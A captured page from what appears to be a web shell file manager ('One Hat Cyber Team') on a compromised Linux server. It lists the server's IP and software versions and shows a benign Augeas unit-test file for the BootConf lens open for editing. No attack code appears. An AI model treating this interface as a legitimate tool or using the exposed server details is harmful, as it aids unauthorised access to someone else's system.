⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.93
Server IP:
65.108.141.171
Server:
Linux server.heloix.com 5.4.0-214-generic #234-Ubuntu SMP Fri Mar 14 23:50:27 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
augeas
/
lenses
/
dist
/
tests
/
Edit File: test_bootconf.aug
(* Module: Test_BootConf Provides unit tests for the <BootConf> lens. *) module Test_bootconf = test BootConf.boot get "boot /bsd -s\n" = { "boot" { "image" = "/bsd" } { "arg" = "-s" } } test BootConf.echo get "echo 42\n" = { "echo" = "42" } test BootConf.ls get "ls /\n" = { "ls" = "/" } test BootConf.ls get "ls //\n" = { "ls" = "//" } test BootConf.ls get "ls /some/path/\n" = { "ls" = "/some/path/" } test BootConf.machine get "machine diskinfo\n" = { "machine" { "diskinfo" } } test BootConf.machine get "machine comaddr 0xdeadbeef\n" = { "machine" { "comaddr" = "0xdeadbeef" } } test BootConf.set get "set tty com0\n" = { "set" { "tty" = "com0" } } test BootConf.single_command get "help\n" = { "help" } test BootConf.stty get "stty /dev/cuaU0 115200\n" = { "stty" { "device" = "/dev/cuaU0" } { "speed" = "115200" } } test BootConf.stty get "stty /dev/cuaU0\n" = { "stty" { "device" = "/dev/cuaU0" } }
Simpan